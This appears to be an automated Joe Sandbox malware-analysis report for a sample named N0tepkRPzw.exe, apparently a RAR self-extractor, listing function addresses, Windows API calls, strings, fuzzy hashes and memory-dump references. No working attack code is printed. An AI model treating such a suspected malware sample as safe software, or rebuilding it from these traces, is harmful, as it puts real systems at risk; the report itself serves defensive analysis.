Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 7b08ea59520cf500837c86d3386383a7c466fa1665119cd2b92b1af37fe3625c
Instruction ID: a5aef8910d638527c356b4132e890b75ae4bd3818093b01e57626a8fff38d5a0
Opcode Fuzzy Hash: 7b08ea59520cf500837c86d3386383a7c466fa1665119cd2b92b1af37fe3625c
Instruction Fuzzy Hash: 6D4139B54083069FC710DF69C88496BFBF8FF88714F044A2EF59692650E779E548CB62

Function 00D7EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D7F5A2,?,00000000,?,00000000,00000000), ref: 00D7EE6F
__fassign.LIBCMT ref: 00D7EEEA
__fassign.LIBCMT ref: 00D7EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D7EF2B
WriteFile.KERNEL32(?,?,00000000,00D7F5A2,00000000,?,?,?,?,?,?,?,?,?,00D7F5A2,?), ref: 00D7EF4A
WriteFile.KERNEL32(?,?,00000001,00D7F5A2,00000000,?,?,?,?,?,?,?,?,?,00D7F5A2,?), ref: 00D7EF83

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 0aaf244fbf1d9d55b8515e1f9e8c06528afece8185f7a4b7ce8a0bff04866241
Instruction ID: b45f0500fc970c88da2f84ed24e965ccf16693f3dc3ff2553bfa6de1c810779c
Opcode Fuzzy Hash: 0aaf244fbf1d9d55b8515e1f9e8c06528afece8185f7a4b7ce8a0bff04866241
Instruction Fuzzy Hash: 16519271A002499FDB10CFA8D885AEEFBF9EF09310F24855BE559E7291E7709941CB70

Function 00D6C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00D6C54A
_swprintf.LIBCMT ref: 00D6C57E

Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D

SetDlgItemTextW.USER32(?,00000066,00D9946A), ref: 00D6C59E
_wcschr.LIBVCRUNTIME ref: 00D6C5D1
EndDialog.USER32(?,00000001), ref: 00D6C6B2

Strings

%s%s%u, xrefs: 00D6C573

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 20e75bc98704ceac996422cebddc3c54508b561acb60af8bd9ed685be881e20c
Instruction ID: 2257584efc11bf18c44c78de47d4c95d09b7425c18894ee296897024b31c2207
Opcode Fuzzy Hash: 20e75bc98704ceac996422cebddc3c54508b561acb60af8bd9ed685be881e20c
Instruction Fuzzy Hash: E141D071910618ABDF22DBA4CC45EEA77BCEF08302F0450A6E949E6160E7719BC8CB74

Function 00D68E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00D68F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D68F59

Strings

utf-8"></head>, xrefs: 00D68EBD
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00D68EB2
<html>, xrefs: 00D68EA7, 00D68EE0
</html>, xrefs: 00D68F0A

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 8df85a8edd5377a45adeff292773a7d4cacee9a2b5acfc9a97aaea3bf25d32d7
Instruction ID: 4d8b6339a44f562d6a39db4683eabf4ab6a34e434d54afecc931d457ceb9faf6
Opcode Fuzzy Hash: 8df85a8edd5377a45adeff292773a7d4cacee9a2b5acfc9a97aaea3bf25d32d7
Instruction Fuzzy Hash: B3312632508312BFD720BB24DC06FAF77A8EF91720F044619F805A62C2FF659A0993B5

Function 00D69635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00D6964E
GetWindowRect.USER32(?,00000000), ref: 00D69693
ShowWindow.USER32(?,00000005,00000000), ref: 00D6972A
SetWindowTextW.USER32(?,00000000), ref: 00D69732
ShowWindow.USER32(00000000,00000005), ref: 00D69748

Strings

RarHtmlClassName, xrefs: 00D696F4

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: a03ffb6e77112ca22676ddc3e2f6ce6ce8bf50c2574dbd1176f9c2f4ab856fde
Instruction ID: 0c99b0a4920390f41c9171bf5691dcd90e26e612fc09f032c2f98b28b7bc13f4
Opcode Fuzzy Hash: a03ffb6e77112ca22676ddc3e2f6ce6ce8bf50c2574dbd1176f9c2f4ab856fde
Instruction Fuzzy Hash: 1831CF32004300EFCB119F68DC49B6BBBACEF48751F048A59FE49AA266DB34D905CB71

Function 00D7BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D7BF79: _free.LIBCMT ref: 00D7BFA2

_free.LIBCMT ref: 00D7C003

Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506

_free.LIBCMT ref: 00D7C00E
_free.LIBCMT ref: 00D7C019
_free.LIBCMT ref: 00D7C06D
_free.LIBCMT ref: 00D7C078
_free.LIBCMT ref: 00D7C083
_free.LIBCMT ref: 00D7C08E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: cad5d598d702eb46e226bf22b125d29767ca709ed53681ab21a685fa5a902ee4
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 8911CE71580B04FAD620BBB0CC46FCBF79DEF05B10F80C856B29D66552EB66F9049AB0

Function 00D720CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D720C1,00D6FB12), ref: 00D720D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D720E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D720FF
SetLastError.KERNEL32(00000000,?,00D720C1,00D6FB12), ref: 00D72151

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8bc92d78022458d7f5ace9725bb8653781b484fa467889529f63ad4d19e74ae1
Instruction ID: 295d8c2d7b8d8829a0852bc185d4159b2c992ba445f7fc4a2dbab12f2bd96da2
Opcode Fuzzy Hash: 8bc92d78022458d7f5ace9725bb8653781b484fa467889529f63ad4d19e74ae1
Instruction Fuzzy Hash: C00147322183216EB7342BB67C8653A2B48FB127307608A29FB1C942E0FF118C00A634

Function 00D6DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 00D6DCC9
KERNEL32.DLL, xrefs: 00D6DCB4
ReleaseSRWLockExclusive, xrefs: 00D6DCD9

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: d28c56f67252c1e0dde44928e5e12f93ba11bda6f355f26581416bbdd3d50c91
Instruction ID: a7a0d9c17b1d14ab9bc9d001541c96cb34f2401b6b54976cd2002facee021f5d
Opcode Fuzzy Hash: d28c56f67252c1e0dde44928e5e12f93ba11bda6f355f26581416bbdd3d50c91
Instruction Fuzzy Hash: 5801F931F413229B8F606F7B7C812A73B969A45716329033AE541D3300DB61C845DBF0

Function 00D60CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60D0D

Part of subcall function 00D5ACF5: GetVersionExW.KERNEL32(?), ref: 00D5AD1A

LocalFileTimeToFileTime.KERNEL32(?,00D60CB8), ref: 00D60D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D60D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D60D56
SystemTimeToFileTime.KERNEL32(?,00D60CB8), ref: 00D60D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60D72

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: ce083377bf732ba5648678bfd8f0e44d5f2c54aa0d910980f07678669a1bb387
Instruction ID: 1e35b2ffaf5462b11309132ff824e7c9e73ff2618efe58918a850e1ce9e163ed
Opcode Fuzzy Hash: ce083377bf732ba5648678bfd8f0e44d5f2c54aa0d910980f07678669a1bb387
Instruction Fuzzy Hash: 6531C57A91020AEBCB00DFE9D8859EFBBBCFF58700B04455AE955E3610E730AA45CB75

Function 00D691B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00D691D4
_memcmp.LIBVCRUNTIME ref: 00D691EB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6bb31d1b6c09660bb1f1c0045c1b54b0de4f40b38a2515dc87554642d3a5ab38
Instruction ID: 8561111c2f1342e95f477d61930c7e891e169dce5eef4d0adde60a138f1327a6
Opcode Fuzzy Hash: 6bb31d1b6c09660bb1f1c0045c1b54b0de4f40b38a2515dc87554642d3a5ab38
Instruction Fuzzy Hash: DA21B07160060EBBD704AF10DCA1E3BB7ADEB55B94B248128FC099B205F270ED4587B4

Function 00D78FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00D90EE8,00D73E14,00D90EE8,?,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D78FA9
_free.LIBCMT ref: 00D78FDC
_free.LIBCMT ref: 00D79004
SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D79011
SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D7901D
_abort.LIBCMT ref: 00D79023

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 49ec5f5c98645bd200de7c5dff594454697976dcc7f4e5738e3750835dfea0db
Instruction ID: 34b7ae4acafbbefb6b6a5cc3b27204f553811e1d8e4848fab62210b6f09e425b
Opcode Fuzzy Hash: 49ec5f5c98645bd200de7c5dff594454697976dcc7f4e5738e3750835dfea0db
Instruction Fuzzy Hash: AFF022365D4B006AC22237386C1EB2F6A2ADFC0B70B38C118F51DE2292FF20C9027235

Function 00D6D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6D31D
TranslateMessage.USER32(?), ref: 00D6D327
DispatchMessageW.USER32(?), ref: 00D6D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6D33C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 3d22737f400e14bc32f1accb62b5eb416e17e038e189686a3dfbd1087c428238
Instruction ID: 3f63ccd627ec9feec2385acb4b7a61ea125d01aea4a03fc9ab7862a547e7da84
Opcode Fuzzy Hash: 3d22737f400e14bc32f1accb62b5eb416e17e038e189686a3dfbd1087c428238
Instruction Fuzzy Hash: 70F03C72E01219EBCB206BA1EC4CEEBBF6EEF527A1F048112FA06D2210D6348541C7B1

Function 00D776BD Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\N0tepkRPzw.exe,00000104), ref: 00D776FD
_free.LIBCMT ref: 00D777C8
_free.LIBCMT ref: 00D777D2

Strings

`%~, xrefs: 00D77703
C:\Users\user\Desktop\N0tepkRPzw.exe, xrefs: 00D776F4, 00D776FB, 00D7772A, 00D77762

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\N0tepkRPzw.exe$`%~
API String ID: 2506810119-4027013704
Opcode ID: 6f760de4f0c69dee2cc5968f9f1aa2707b36e6c9d9ba6d59019c2989b0d0fff2
Instruction ID: f49a6015e42ae2164bc22fe9cd8f97c4fcefe83f120d47abd3bae79ceec5bd07
Opcode Fuzzy Hash: 6f760de4f0c69dee2cc5968f9f1aa2707b36e6c9d9ba6d59019c2989b0d0fff2
Instruction Fuzzy Hash: 69318F75A04318EFDB25DF99DC8599EBBECEB84710F2485A6E50897211E6708E40CBB0

Function 00D6C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00D6C435

Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2

Strings

MIN, xrefs: 00D6C4A3
HIDE, xrefs: 00D6C474
<, xrefs: 00D6C41E
MAX, xrefs: 00D6C487

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 198548c50a75a286931f080f29170697cfd7ef3836fe5b58adc448af4b208ee3
Instruction ID: 092beee785d18941db9cecdeee965a8c759c63325dff98f0f4bc2f00d34dd217
Opcode Fuzzy Hash: 198548c50a75a286931f080f29170697cfd7ef3836fe5b58adc448af4b208ee3
Instruction Fuzzy Hash: 19318376910209ABDB21DA94CC45FFA77BCEB14310F044066F985D6051EBB1AEC4CA70

Function 00D6ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00D6ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 00D6AE22
DeleteObject.GDI32(00000000), ref: 00D6AE54
DeleteObject.GDI32(00000000), ref: 00D6AE77

Part of subcall function 00D69E1C: FindResourceW.KERNEL32(00D6AE4D,PNG,?,?,?,00D6AE4D,00000066), ref: 00D69E2E
Part of subcall function 00D69E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E46
Part of subcall function 00D69E1C: LoadResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E59
Part of subcall function 00D69E1C: LockResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E64

Strings

], xrefs: 00D6AE2A

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
